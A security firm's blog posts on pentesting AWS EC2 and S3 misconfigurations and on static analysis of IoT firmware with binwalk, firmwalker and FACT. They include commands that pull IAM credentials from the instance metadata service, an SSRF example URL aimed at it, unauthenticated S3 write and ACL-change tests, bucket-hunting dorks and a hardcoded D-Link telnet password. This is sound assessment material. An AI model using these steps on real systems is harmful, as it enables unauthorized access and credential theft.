Tuesday, September 18, 2018

A practical guide to testing the security of Amazon Web Services (Part 2: AWS EC2)

This is Part 2 of 3 on our practical guide to testing the security of Amazon Web Services. We are tackling the main services provided by Amazon for its cloud-based platform to support web applications and we started by discussing AWS S3 buckets and their security. You can get a little overview of AWS and catch up on important aspects of testing AWS S3 by reading our previous post.

In this second part, we describe another important AWS service used on a daily basis by many users: Elastic Compute Cloud or, more commonly, EC2.


Elastic Compute Cloud (EC2) is another widely used service offered by Amazon. It allows users to rent virtual computers on which they can run arbitrary applications. AWS EC2 provides a scalable solution to deploy a new computer, which in AWS terminology is called an "instance", and to manage its status via a web-based user interface. The user can manage every aspect of an EC2 instance, from creation and execution to the definition of access policies. It is undeniable that AWS EC2 constitutes a powerful tool that, if not properly configured and protected, will inevitably result in a security breach. AWS EC2 instances provide many different features. In this post we discuss two features that are particularly relevant from a security perspective: Elastic Block Store and the Instance Metadata Service.

AWS EC2 instances can benefit from other AWS services to which they are granted access. A typical example, which we first introduced in Part 1 and further explore here, is the synergy between AWS EC2 instances and AWS S3 buckets. When an AWS EC2 instance is created it requires, as all computers do, a persistent storage unit where data can be saved. Amazon thus provides Elastic Block Store (EBS), a block-level storage solution that offers persistent storage and can be attached to an AWS EC2 instance. An EBS block is therefore an important part of an AWS EC2 instance, as it stores the data processed by the instance itself. Given its importance, it is convenient to be able to take snapshots of an EBS block and store them safely so that, in case of a failure, the AWS EC2 instance can be restored to a safe state. To accomplish this, Amazon offers the possibility of taking EBS snapshots and storing them in its storage service, AWS S3.

Let's now discuss another interesting feature that AWS EC2 instances have access to, called the Instance Metadata Service (IMS). IMS allows any AWS EC2 instance to retrieve data about the instance itself that can be used to configure or manage the running instance. The data available from the IMS ranges from the hostname of the instance to the initialization script that is executed upon launching the instance. All this information can be retrieved only by the AWS EC2 instance itself, by querying a specific API end-point located at http://169.254.169.254/.
As will become clear in the remainder of this post, this end-point provides valuable information that an attacker might use to compromise not only the AWS EC2 instance but other services as well. The documentation for the IMS, in fact, states the following:
Although you can only access instance metadata and user data from within the instance itself, the data is not protected by cryptographic methods. Anyone who can access the instance can view its metadata. Therefore, you should take suitable precautions to protect sensitive data (such as long-lived encryption keys). You should not store sensitive data, such as passwords, as user data.
The IMS thus becomes a crucial aspect when analyzing the security of AWS EC2 instances.

Publicly accessible EC2 snapshots

As just mentioned, EBS snapshots are, by default, stored in a private AWS S3 bucket that is not directly accessible via the S3 dashboard. However, EBS snapshots are manageable via the AWS EC2 interface and their permissions can be changed to make them public. Needless to say, you should never do that.
From a security perspective, if during a penetration testing activity you find yourself dealing with possibly publicly accessible EBS snapshots, you can try to access the EBS block by mounting it in an EC2 instance under your control. Think of an EBS block as a virtual disk that you can mount like you normally would. To mount an EBS block you thus need two things:

  1. an AWS EC2 instance under your control where you can mount the EBS block
  2. the ID that identifies the snapshot

For (1) I recommend you check out the AWS documentation on how to create and launch an EC2 instance. For (2) you can use the aws command to search for publicly accessible EBS snapshots as follows:

aws --profile [PROFILE] ec2 describe-snapshots --filters [FILTERS] --region [REGION]

This command will respond with a JSON document listing all the publicly available snapshots that satisfy the values specified by the --filters flag (for a complete description of the kinds of filters you can use, check the documentation). The JSON will contain some information about each snapshot along with the corresponding SnapshotId value that we need. For example, let's assume that we want to list all the publicly accessible snapshots whose description contains the word backup and which are located in the us-east-2 region; this is what we would do:

aws --profile default ec2 describe-snapshots --filters Name=description,Values="*backup*" --region us-east-2

The result of executing such a command would be a JSON document listing all the publicly accessible snapshots satisfying our search criteria.

{
    "Snapshots": [
        {
            "Description": "Phoenix_competitor_analysis_backup_set",
            "Encrypted": false,
            "VolumeId": "vol-ffffffff",
            "State": "completed",
            "VolumeSize": 100,
            "StartTime": "2017-08-30T05:24:48.000Z",
            "Progress": "100%",
            "OwnerId": "234190327268",
            "SnapshotId": "snap-0dc716aaf28921496"
        },
        {
            "Description": "backup",
            "Encrypted": false,
            "VolumeId": "vol-0b21c8a6c158367fc",
            "State": "completed",
            "VolumeSize": 8,
            "StartTime": "2018-05-21T13:01:49.000Z",
            "Progress": "100%",
            "OwnerId": "388304843501",
            "SnapshotId": "snap-041c06c0c3658323c"
        },
        {
            "Description": "backup",
            "Encrypted": false,
            "VolumeId": "vol-0ee056a878d9dfdb1",
            "State": "completed",
            "VolumeSize": 30,
            "StartTime": "2018-01-07T13:52:56.000Z",
            "Progress": "100%",
            "OwnerId": "682345607706",
            "SnapshotId": "snap-0e793674b08737e95"
        },
        {
            "Description": "copy of backup sprerdda - BAckup-17-8-2018",
            "Encrypted": false,
            "VolumeId": "vol-ffffffff",
            "State": "completed",
            "VolumeSize": 30,
            "StartTime": "2018-08-22T15:03:48.179Z",
            "Progress": "100%",
            "OwnerId": "869858413856",
            "SnapshotId": "snap-02326682d84d3aedd"
        }
    ]
}
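To pull just the SnapshotId values out of a listing like this (for example, to feed them to create-volume), a quick grep can help. Here we save an abridged fragment of the output to a file purely for illustration, reusing two IDs from the listing above:

```shell
# Abridged describe-snapshots output, saved to a file for illustration
# (snapshot IDs taken from the listing above)
cat > snapshots.json <<'EOF'
{
    "Snapshots": [
        { "Description": "backup", "SnapshotId": "snap-041c06c0c3658323c" },
        { "Description": "backup", "SnapshotId": "snap-0e793674b08737e95" }
    ]
}
EOF

# Extract only the snapshot IDs, ready to be fed to create-volume
grep -o 'snap-[0-9a-f]*' snapshots.json
```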

Once you have identified the snapshot of interest, you have to create an EBS volume from that snapshot in order to be able to mount it. The following command will do just that, creating an EBS volume in your account.

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id [SNAPSHOT_ID]

Finally, from your AWS console, create an EC2 instance and mount the newly created EBS volume in it.
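Alternatively, the attach-and-mount steps can also be done from the command line. The following is only a sketch: the volume ID, instance ID, device name and mount point are hypothetical placeholders, and the device name seen inside the instance may differ.

```shell
# Attach the volume created from the snapshot to an instance you control
# (IDs and device name below are placeholders)
aws ec2 attach-volume \
    --volume-id vol-0123456789abcdef0 \
    --instance-id i-0123456789abcdef0 \
    --device /dev/sdf \
    --region us-west-2

# Then, from a shell ON the instance, locate and mount the new disk
lsblk                                  # the volume often shows up as /dev/xvdf
sudo mkdir -p /mnt/snapshot
sudo mount /dev/xvdf1 /mnt/snapshot    # the partition number may differ
ls /mnt/snapshot                       # browse the files from the snapshot
```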

Metadata leakage 

At the beginning of this post we discussed a peculiar feature of AWS EC2 instances called the Instance Metadata Service (IMS). Recall that IMS allows any AWS EC2 instance to retrieve data about the instance itself that can be used to configure or manage the running instance, and that it is accessible from within the instance itself by querying the end-point located at http://169.254.169.254/.
As already mentioned, a lot of juicy information can be retrieved by querying that end-point. The following list summarizes some of the most interesting entries; many more are available.

  • /latest/meta-data/ami-id — the AMI ID used to launch the instance.
  • /latest/meta-data/iam/security-credentials/ — if there is an IAM role associated with the instance, returns its name (which can be used in the next entry).
  • /latest/meta-data/iam/security-credentials/role-name — if there is an IAM role associated with the instance, contains the temporary security credentials associated with the role (for more information, see Retrieving Security Credentials from Instance Metadata). Otherwise, not present.
  • /latest/user-data — returns the user-defined script which is run when a new EC2 instance is launched for the first time.

Usage examples are shown below:
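For instance, the entries above can be queried with curl from a shell on the instance. This is only a sketch: role-name is a placeholder for the actual role name returned by the previous call, and these requests only work from within the EC2 instance itself.

```shell
# List the available metadata categories
curl http://169.254.169.254/latest/meta-data/

# AMI ID used to launch the instance
curl http://169.254.169.254/latest/meta-data/ami-id

# Name of the IAM role attached to the instance (if any)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Temporary credentials for that role ("role-name" is a placeholder)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

# User-data script executed when the instance is first launched
curl http://169.254.169.254/latest/user-data
```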



{
    "Code" : "Success",
    "LastUpdated" : "2018-08-27T15:23:14Z",
    "Type" : "AWS-HMAC",
    "AccessKeyId" : "AS[REDACTED]TEM",
    "SecretAccessKey" : "EgKirlp[REDACTED]hkYp",
    "Token" : "FQoGZXIvYXdzEJH//////////wE[REDACTED]=",
    "Expiration" : "2018-08-27T21:36:24Z"
}

#!/bin/bash -xe
sudo apt-get update
# install coturn
apt-get install -y coturn
# install kms
sudo apt-get update
sudo apt-get install -y wget
echo "deb http://ubuntu.kurento.org xenial kms6" | sudo tee /etc/apt/sources.list.d/kurento.list
wget -O - http://ubuntu.kurento.org/kurento.gpg.key | sudo apt-key add -
sudo apt-get update
sudo apt-get install -y kurento-media-server-6.0
systemctl enable kurento-media-server-6.0
# enable coturn
sudo echo TURNSERVER_ENABLED=1 > /etc/default/coturn
# turn config file
sudo cat >/etc/turnserver.conf<<-EOF

sudo /usr/local/bin/cfn-signal -e $? --stack arn:aws:cloudformation:us-east-2:118366151276:stack/KurentoMinded/3cbb23a0-3d77-11e8-953d-503f3157b035 --resource WaitCondition --region us-east-2

To take advantage of such juicy information, the attacker has to find a way to query the IMS from within the EC2 instance itself. There are many ways in which this can be accomplished, ranging from finding a Server Side Request Forgery (SSRF) vulnerability, to exploiting a proxy set up on the EC2 instance, all the way to DNS rebinding as described by Alexandre Kaskasoli.
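As a toy illustration of the SSRF case: suppose the instance hosts a web application with a parameter that fetches arbitrary URLs server-side. The host and parameter below are entirely made up, but the idea is that the request to the link-local address originates from the instance itself:

```shell
# Hypothetical SSRF: the server fetches the URL on our behalf, so the
# metadata service sees a request coming from the instance itself
curl 'http://vulnerable.example.com/render?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'
```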

Conclusion of Part 2

AWS EC2 is undeniably a powerful service that many companies are taking advantage of. As described above, the security of an AWS EC2 instance is crucial to keep a company safe from malicious attackers. This post wrapped up the main security issues related to AWS EC2 instances and how security experts can test for the presence of such issues during an assessment.

Tuesday, September 11, 2018

A practical guide to testing the security of Amazon Web Services (Part 1: AWS S3)

Back in the day, the word Amazon used to refer to over half of Earth's rainforests. While this is still true, it isn't what most people think of when they hear the word Amazon. Nowadays, people think of Amazon as a place where they can order goods from the comfort of their couches. However, Amazon offers much more than just an online marketplace. In 2006, Amazon launched a subsidiary called Amazon Web Services (AWS), a platform that provides on-demand cloud computing for everyone. The adoption of AWS has grown considerably in the past years: more and more companies are now embracing AWS and deploying their web applications in the cloud offered by Amazon. But what does that mean from a security perspective?

In this series of posts, we discuss the main AWS services used by web applications and how they can be tested from a security standpoint. We take into consideration the following services: S3, EC2, Cognito and CloudFront. For each service we give a brief description of its usage and then an analysis of how to test its configuration, along with examples of possible attack scenarios.

A little overview

Amazon Web Services, simply known as AWS, offers many different cloud hosting services that companies can use when building their web applications. The wide range of services offered by Amazon can be very convenient for companies looking to outsource part (or the entirety) of their infrastructure as it provides robust and flexible solutions for building modern web applications.
Such a variety of services has paved the way for new types of security considerations and new attack surfaces and, of course, when it comes to abusing AWS services the one culprit is misconfiguration.
A misconfigured service might allow unauthorized access to a resource that in turn might give access to other resources, spreading until the entire system has been compromised.


AWS S3 Buckets

Simple Storage Service (S3) is probably the most popular of the AWS services and provides a scalable solution for object storage via web APIs. S3 buckets can be used for many different purposes and in many different scenarios.

Consider the case of a web application that requires a place to store content that is then served to users: S3 comes to the rescue. The image below depicts a scenario where a web application makes use of AWS S3 to store images uploaded by users as well as content, such as JavaScript and CSS, used by the web application itself.

Moreover, S3 buckets can be used to store and serve static web sites by enabling the "Static website hosting" property. This property gives the possibility of storing and serving only static content written in HTML, meaning that dynamic pages written in server-side code, such as PHP or ASP, will not be executed.

S3 buckets can also be connected to other AWS services to provide support or enhance their features. Such synergy between S3 buckets and other AWS services inevitably results in a lot of juicy information being stored in buckets (as depicted in the picture below). For example, AWS EC2 instances' snapshots are stored in S3 buckets. As a result, a poorly configured S3 bucket may end up exposing sensitive information contained in an EC2 instance, possibly including, but not limited to, keys which grant access to other EC2 instances or services.

There's always a Pot of Gold at the Rainbow's End

AWS S3 buckets provide different access permissions which, if misconfigured and left open to unauthorized access, might result in many different attack scenarios. Over the past years, AWS S3 buckets have come to be known as the primary source of leakage when companies suffer data breaches. No company is immune to publicly open AWS S3 buckets in the wild, and whenever a breach happens, they make their way into major press headlines.

Booz Allen Hamilton, a U.S. defense contractor, left data publicly accessible through an insecurely configured S3 account containing files related to the National Geospatial-Intelligence Agency (NGA), which handles battlefield satellite and drone surveillance imagery.
Accenture, one of the biggest consulting agencies out there, left openly accessible AWS S3 buckets containing sensitive information including plain text passwords.
Verizon, too, was responsible, multiple times, for leaving misconfigured AWS S3 buckets which contained the personal information of millions of its customers.

Misconfigured AWS S3 buckets that allow unauthorized access are thus abused by attackers to compromise the privacy of the data stored in those buckets, ultimately violating the privacy of millions of users around the world.

Violation of users' privacy is not the only thing that can be achieved: being able to access S3 buckets might also provide an attacker with the knowledge required to access other AWS services.
If we consider a poorly configured S3 bucket that contains EC2 snapshots, then an attacker might be able to access those EC2 snapshots and retrieve security keys to the EC2 instance itself.
Furthermore, consider the case in which an AWS S3 bucket is used to store and serve JavaScript content to a web application. If the bucket is left misconfigured, allowing an attacker to gain write access, he might be able to perform an attack that has been called "GhostRider". Quoting Sekhar Sarukkai, chief scientist at Skyhigh Networks,
Bucket owners who store Javascript or other code should pay particular attention to this issue to ensure that 3rd parties don’t silently overwrite their code for drive-by attacks, bit-coin mining or other exploits. Even benign image or document content left open for overwriting can be exploited for steganography attacks or malware distribution.
It thus becomes crucial to be well aware of how AWS S3 buckets are configured and how to properly test the permissions on those buckets so as to avoid misuse.

Get your hands dirty

The first step when testing the security of S3 buckets is to identify the location of the bucket itself, meaning the URL that can be used to interact with the bucket.
Note that S3 bucket names are unique, meaning that two different AWS users cannot have buckets with the same name. This fact can be helpful when trying to guess the name of a bucket from the name of the web application.

Let's start by considering a bucket named mindeds3test.
The URL schemas that can be used to interact with the bucket are:

http://mindeds3test.s3.amazonaws.com/
http://s3.amazonaws.com/mindeds3test/

Moreover, if the bucket has the "Static website hosting" property enabled, it provides access to static HTML pages via the following URL, where [region] is the AWS region hosting the bucket:

http://mindeds3test.s3-website-[region].amazonaws.com/

S3 bucket identification

As described above, the identification of a bucket boils down to identifying the URL that points to the bucket. There are many different ways to do so.

HTML inspection

Let's start easy and consider the HTML code of the web application under analysis. It might in fact happen that you find S3 URLs directly in the HTML code, saving you the trouble of looking around for the buckets. Start by having a look at the HTML code and the resources loaded by the web page in order to identify S3 buckets.


Brute force

A brute-force approach, possibly based on a wordlist of common words along with specific words coming from the domain you're testing, might also do the trick. For example, we can use the Burp Intruder to perform a series of requests to the URL http://s3.amazonaws.com/[bucketname]. This URL does not identify a bucket by itself; however, it responds with a convenient PermanentRedirect message in case a bucket is found and a NoSuchBucket message otherwise.

In the Intruder tab, configure http://s3.amazonaws.com as the target host, then move to Positions, set up a simple GET request, and put the payload position right after the / character of the request. Proceed to the Payloads section and load your wordlist; finally, move to Options and, in the Grep - Match panel, add a single match for the word PermanentRedirect. This will help in identifying and sorting the results of the attack. Now press the Start attack button and the Intruder will start performing requests and collecting the results of possible buckets.

As shown in the picture above, our Grep - Match option causes the creation of an additional column in the results of the attack, providing a convenient way to identify which payloads correspond to valid AWS S3 buckets and which don't.
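If you prefer the command line over Burp, the same check can be sketched as a small shell loop. The base name and suffixes below are hypothetical and would normally come from your wordlist; note that an AccessDenied answer also reveals that a bucket exists, even if it is not listable anonymously.

```shell
# Probe candidate bucket names against the S3 endpoint; existing buckets
# answer with PermanentRedirect, a listing, or AccessDenied, while
# non-existing ones answer with NoSuchBucket
for suffix in "" -backup -uploads -static -dev; do
    name="mindeds3test${suffix}"
    body=$(curl -s "http://s3.amazonaws.com/${name}")
    case "$body" in
        *PermanentRedirect*|*ListBucketResult*|*AccessDenied*) echo "exists: ${name}" ;;
        *NoSuchBucket*) echo "not found: ${name}" ;;
    esac
done
```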

Google Dork

Google always comes to the rescue when it comes to searching for URLs. You can in fact use the convenient inurl: directive to search for possibly interesting AWS S3 buckets. We report the following list of Google dorks that can be used to retrieve possibly juicy AWS S3 buckets.

inurl:s3.amazonaws.com/legacy/
inurl:s3.amazonaws.com/uploads/
inurl:s3.amazonaws.com/backup/
inurl:s3.amazonaws.com/mp3/
inurl:s3.amazonaws.com/movie/
inurl:s3.amazonaws.com/video/
inurl:s3.amazonaws.com

Refer to https://it.toolbox.com/blogs/rmorril/google-hacking-amazon-web-services-cloud-front-and-s3-011613 for more interesting Google dorks.

DNS Caching

There are many services out there that maintain some sort of DNS cache that can be queried by users. By taking advantage of such services it is possible to hunt down AWS S3 buckets.
Interesting services we recommend checking out are:

https://buckets.grayhatwarfare.com/ (created specifically to collect AWS S3 buckets)

The following is a screenshot from findsubdomains showing how easy it can be to retrieve AWS S3 buckets by searching for subdomains of s3.amazonaws.com

Bing reverse IP

Microsoft's Bing search engine can be very helpful in identifying AWS S3 buckets thanks to its ability to search for domains given an IP address. Given the IP address of a known AWS S3 bucket, just by taking advantage of the ip:[IP] feature of Bing it is possible to retrieve many other AWS S3 buckets resolving to the same IP.

Testing permissions

Once an S3 bucket has been identified, it is time to test its access permissions and try to abuse them. An S3 bucket provides a set of five permissions that can be granted at the bucket level or at the object level.

READ
At bucket level, allows listing the objects in the bucket.
At object level, allows reading the content as well as the metadata of the object.

WRITE
At bucket level, allows creating, overwriting, and deleting objects in the bucket.
At object level, allows editing the object itself.

READ_ACP
At bucket level, allows reading the bucket’s Access Control List.
At object level, allows reading the object’s Access Control List.

WRITE_ACP
At bucket level, allows setting the Access Control List for the bucket.
At object level, allows setting the Access Control List for the object.

FULL_CONTROL
At bucket level, is equivalent to granting the READ, WRITE, READ_ACP, and WRITE_ACP permissions.
At object level, is equivalent to granting the READ, READ_ACP, and WRITE_ACP permissions.

Testing READ

Via HTTP, try to access the bucket by requesting the following URL

It is also possible to use the AWS command line and list the content of the bucket with the following command:
aws s3 ls s3://[bucketname] --no-sign-request

Note: the --no-sign-request flag tells aws not to use credentials to sign the request.

A bucket that allows reading its content will answer with a list of the content. The HTTP request will be answered with an XML page, while the command line request will be answered with a list of files.

Testing WRITE

Via the AWS command line, try to upload a local file to the bucket:

aws s3 cp localfile s3://[bucketname]/test-upload.txt --no-sign-request

A bucket that allows arbitrary file upload will answer with a message showing that the file has been uploaded:

upload: Pictures/ec2-s3.png to s3://mindeds3test01/test-upload.txt

Testing READ_ACP

aws s3api get-bucket-acl --bucket [bucketname] --no-sign-request

An ACL can also be specified for a single object and can be read with the following command:
aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request

Both commands will output a JSON document describing the ACL policies of the specified resource.


Testing WRITE_ACP

Via the AWS command line:
aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request

An ACL can also be specified for a single object and can be written with the following command:
aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request

Neither command displays any output if the operation is successful.

Any authenticated AWS client

Finally, AWS S3 permissions used to include a peculiar grant named "any authenticated AWS client". This permission allows any authenticated AWS user, regardless of who they are, to access the bucket. This option is not provided anymore, but there are still buckets with this type of permission enabled.
To test for this type of permission, you should create an AWS account and configure it locally with the aws command line:

aws configure

You can then try to access the bucket with the same commands described above; the only difference is that the flag --no-sign-request should be replaced with --profile [PROFILENAME], where PROFILENAME is the name of the profile created with the configure command.
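For example, the earlier READ and READ_ACP checks would then become (a sketch, assuming the profile is named default):

```shell
# Same checks as before, but signed with your own AWS profile
aws s3 ls s3://[bucketname] --profile default
aws s3api get-bucket-acl --bucket [bucketname] --profile default
```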

Conclusion of Part 1

AWS S3 buckets provide a convenient means of outsourcing storage resources, so it should come as no surprise that many companies decide to take advantage of such a service. However, the ease with which AWS S3 buckets can be created might, over time, make it difficult to keep track of all of them. This post showed how to test publicly accessible AWS S3 buckets. Once a wrongly configured bucket is identified, the number one priority is to restrict its access to authorized users only.

Remember, you are one misconfigured S3 bucket away from becoming the next major press headline. 

Friday, September 7, 2018

Pentesting IoT devices (Part 1: Static Analysis)


Intelligent dishwashers, smart factories, connected sensors and Wi-Fi fridges: these are only a few examples of everyday objects that are now connected to the Internet.
All these "brainless" objects have been upgraded to become Internet of Things devices, and now they're changing our lifestyle, communicating with us at any time and in any place.
As security experts, we have to face the challenge of testing the security of these devices in order to find their vulnerabilities before the bad guys do.
At the same time, it is also important to make manufacturers and organizations aware of the security risks associated with this kind of device.

This article gives a brief overview of the IoT testing approach that we use during our activities here at Minded Security.
It has to be noted that this article is not intended as a strict guide suitable for all situations, but as a starting point for developing your own testing methodology and a good arsenal of tools suitable for the majority of IoT security assessments. Now, let's start with the fun.

Preliminary Analysis

The first thing to do in order to better understand an IoT device is to perform some preliminary analysis, which consists in conducting a first recon on a new firmware we have never seen before.
The main goal here is to get an idea of the firmware architecture and whether it is encrypted or not.

The firmware package will be analyzed and the file system will have to be unpacked and extracted.

This process can be summarized in the following steps:

  • Identify the target device: if you don’t know what device runs your firmware, additional analysis needs to be performed, for example with an internet search.
  • Understand whether the firmware is encrypted or compressed:
    • use strings against the firmware; if there are no strings in the output, the file is probably obfuscated
    • launch hexdump with the “-C” argument, which provides some context for the strings
    • use Radare2 with the “izz” command to search for non-ASCII characters, i.e. Unicode-encoded strings
  • Identify the firmware architecture and FS: Binwalk is useful to examine and extract binary files, so launch it against the firmware without any arguments in order to gain useful information about it.
  • Extract the filesystem: once the filesystem type has been identified (e.g. Squashfs, Cramfs, YAFFS2 and so on) the next steps are:
    • extract it from the firmware
    • mount it in order to access the data inside. Depending on the filesystem type of your device, it is possible to use different tools like dd, binwalk or fmk to extract the filesystem.
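The encryption checks from the steps above can be sketched as follows. Here we fabricate a tiny dummy "firmware" file just to demonstrate the commands; on a real assessment you would point them at the actual firmware image.

```shell
# Fabricate a tiny dummy "firmware" image just to demonstrate the commands;
# on a real assessment, point them at the actual firmware file instead
printf 'garbage\x00\x01\x02U-Boot 1.1.3\x00more-bytes\n' > firmware.bin

# Readable strings in the output suggest the image is NOT encrypted
strings -n 6 firmware.bin

# Hex dump with ASCII context for the same check
hexdump -C firmware.bin | head

# On a real image you could also run (not executed here):
#   binwalk -E firmware.bin    # entropy plot: uniformly high entropy hints at encryption
#   r2 -qc izz firmware.bin    # radare2: list strings, including Unicode-encoded ones
```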
Below is an example of a preliminary analysis, performed with binwalk, of the D-Link WiFi Day & Night DCS-932L camera firmware.

$ binwalk DCS-932L_fw_v108_b2.bin
106352        0x19F70         U-Boot version string, "U-Boot 1.1.3"
106816        0x1A140         CRC32 polynomial table, little endian
124544        0x1E680         HTML document header
124890        0x1E7DA         HTML document footer
124900        0x1E7E4         HTML document header
125092        0x1E8A4         HTML document footer
125260        0x1E94C         HTML document header
125953        0x1EC01         HTML document footer
327680        0x50000         uImage header, header size: 64 bytes, header CRC: 0x1457B432, created: 2014-02-11 05:50:43, image size: 3678347 bytes, Data Address: 0x80000000, Entry Point: 0x803B8000, data CRC: 0x6E80DDBC, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "Linux Kernel Image"
327744        0x50040         LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 6433659 bytes

As you can see from the tool output, there's a Linux kernel inside a uImage at position 0x50000 and some LZMA compressed data at 0x50040 that could be the filesystem.
Let's go ahead and unpack the firmware of the IP camera with the
binwalk -eM DCS-932L_fw_v108_b2.bin
command (the “-e” option extracts the files and “-M” tells binwalk to perform the extraction recursively).

As a result you will find (inside the /_DCS-932L_fw_v108_b2.bin.extracted/_50040.extracted folder) a file named 3DA000 that needs to be investigated further.
Using the “file” command it is possible to see that it is a cpio archive which contains a filesystem.

$ file 3DA000
3DA000: ASCII cpio archive (SVR4 with no CRC)

At this point it is possible to use the “cpio” command to extract the filesystem as shown below:

$ cpio -ivd --no-absolute-filenames -F 3DA000
cpio: Removing leading `/' from member names
[. . .]

Finally we can see and navigate through the firmware directories:

$ ls
bin  dev  etc  etc_ro  home  init  lib  media  mnt  mydlink  proc  sbin  sys  tmp  usr  var

Please note that you can find the same files and folders inside the /_DCS-932L_fw_v108_b2.bin.extracted/_50040.extracted/_3DA000.extracted/cpio-root folder, because binwalk has already extracted them; but, for the sake of completeness, we preferred to show the use of the “cpio” command to extract the files.

Now that we have managed to correctly extract and access the filesystem, our interest is in finding any kind of security-related issues or bad practices, such as:

  • Hardcoded credentials
  • Weak credentials hash contained in files like /etc/passwd
  • Custom scripts or configuration files with any kind of sensitive information
  • Web pages or binary source files that could be vulnerable to code injection
  • Private keys 
  • Links and IP addresses that could expand the attack surface of the IoT device
A great list of IoT-related vulnerabilities, as well as other examples of the previously mentioned tools' usage, can be found under the OWASP IoT project at the following link:

Static Analysis

In this section we are going to present three different methods to perform static analysis of a filesystem:

  • the first one is a full “manual” research with a small piece of automation; 
  • then we will present a tool called firmwalker that aims to scrape through the files and extract useful information;
  • finally, we are going to show a fully automated tool (FACT) that automatically extracts and analyzes a firmware.


As you can see from the following example, by grepping for the keyword “admin” it is possible to notice a file, RT2860_default_novlan, that could be interesting to analyze further.

$ grep -iR admin
[. . .]
[. . .]

In the snippet below we printed the configuration file with some juicy information:

$ cat RT2860_default_novlan
#The word of "Default" must not be removed
[. . .]


Firmwalker is a script that uses a list of interesting files and keywords to scrape through your firmware filesystem directory, helping to automate the search for points of interest.
The tool bases its search on many keywords divided into categories such as: binaries, passfiles and so on (for more details, all the keywords are listed inside the /data folder, as you can see from its GitHub page).
The tool's usage is very simple: you only have to specify the filesystem folder as input:

./firmwalker.sh /cpio-root

***Firmware Directory***
***Search for password files***
##################################### passwd
[. . .]

***Search for files***
##################################### *.conf

***Search for shell scripts***

##################################### shell scripts
-------------------- password --------------------
[. . .]
[. . .]

***Search for ip addresses***

##################################### ip addresses
[. . .]

As you can see, it's easy to find potentially sensitive files, scripts or other private data. You can also notice that firmwalker has found something interesting in the RT2860_default_novlan file and has listed it under the "password" category. This is due to the fact that, as we did manually, firmwalker has identified the keyword "admin" inside the file; specifically, that keyword is listed in firmwalker's data/patterns file, as you can see from the tool's source code.

Note: to use firmwalker you will have to install the Shodan CLI or comment out the lines of code that invoke it, since the tool exits if the Shodan CLI is not installed. More information about this bug.

FACT: firmware extraction and static analysis

“The Firmware Analysis and Comparison Tool (formerly known as Fraunhofer's Firmware Analysis Framework (FAF)) is intended to automate most of the firmware analysis process. It unpacks arbitrary firmware files and processes several analysis. Additionally, it can compare several images or single files.”

If you need a fast and fully automated analysis, this tool is what you are looking for. Without knowing anything about binwalk, firmwalker and so on, it is possible to get the same results in terms of firmware extraction and static analysis using FACT. Below we list the main features of this tool:

  • Easy to use thanks to the graphical web user interface
  • Fully automated process of extraction and static analysis
  • Extensible with custom plugins

In order to test FACT's functionality, we used the aforementioned D-Link firmware as input and selected different analysis options, as shown in the picture below:

Different kind of tests that FACT can perform against a firmware

Once the analysis is over, it is possible to review the results through different sub-menus. For example, as you can see in the images below, FACT provides general information about the firmware, a binwalk analysis with an entropy graph (useful to tell whether a firmware is encrypted) and the names of some firmware binaries.

General information about the analyzed firmware

Binwalk and entropy analysis results

Binaries found inside the firmware 
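The entropy graph mentioned above can be approximated by hand. The sketch below is ours, not FACT's: a small shell function estimating the Shannon entropy of a file in bits per byte, where values close to 8.0 suggest encrypted or compressed content and low values suggest plain code or text.

```shell
# estimate Shannon entropy (bits per byte) of a file: count each byte
# value, turn counts into probabilities, sum -p*log2(p)
entropy() {
    total=$(wc -c < "$1")
    # od dumps one unsigned decimal per byte; tr/grep put one value per line
    od -An -v -tu1 "$1" | tr -s ' ' '\n' | grep -v '^$' |
        sort -n | uniq -c |
        awk -v total="$total" '
            { p = $1 / total; H -= p * log(p) / log(2) }
            END { printf "%.2f\n", H }'
}

# usage (file name is hypothetical): entropy firmware.bin
```

Running this over a firmware image, or over fixed-size chunks of it, gives a rough textual equivalent of FACT's entropy graph.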
As a final consideration about this tool: FACT allows a fast firmware analysis, because all you have to do is feed it a zip file containing the binaries and it will perform a complete static analysis through many tools.

Using the outputs to find vulnerabilities

To further investigate the aforementioned issue of hardcoded credentials, let's download from here the known-vulnerable D-Link DIR-412 router firmware and manually analyze it in order to find credentials left inside configuration files or custom scripts, which is a common problem in this kind of device.

Once the filesystem has been extracted with binwalk, it is possible to dig into it and search for possibly misconfigured services, like SSH or telnet, that could allow a remote attacker to access the device. By using the grep command with the "telnet" keyword, some interesting data can be quickly spotted.

$ grep -iR telnet
etc/init0.d/S80telnetd.sh: telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
etc/init0.d/S80telnetd.sh: telnetd &
etc/init0.d/S80telnetd.sh: killall telnetd

At this point it is already clear that grep has found an interesting script, S80telnetd.sh, that manages the telnet service. By analyzing the whole etc/init0.d/S80telnetd.sh script, you can notice that the telnetd process is started with a hardcoded credential set: Alphanetworks as username and the content of the image_sign variable as password.

$ cat S80telnetd.sh
echo [$0]: $1 ... > /dev/console
if [ "$1" = "start" ]; then
    if [ -f "/usr/sbin/login" ]; then
        image_sign=`cat /etc/config/image_sign`
        telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
    else
        telnetd &
    fi
else
    killall telnetd
fi

In order to recover the password of the telnet service, we print the content of the /etc/config/image_sign file.

$ cat ./config/image_sign
wrgn28_dlob_dir412

Finally, we have discovered that the router's telnet server is executed with a set of hardcoded credentials (Alphanetworks:wrgn28_dlob_dir412). This misconfiguration represents a serious security concern, because it could allow a malicious user who knows this information to easily break into the router.
It is interesting to notice that this kind of vulnerability can be found only by performing an effective manual code review; tools such as firmwalker or FACT can only help to identify interesting entry points (like the presence of a telnet service).
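Collecting those entry points can itself be scripted. The helper below is our own illustration, not part of firmwalker or FACT: it flags any file in the extracted filesystem that spawns a network daemon, so the analyst knows which init scripts deserve a manual review like the one performed on S80telnetd.sh (the daemon list is illustrative).

```shell
# hedged sketch: list files that reference common network daemons,
# i.e. candidate entry points for manual code review
find_daemon_scripts() {
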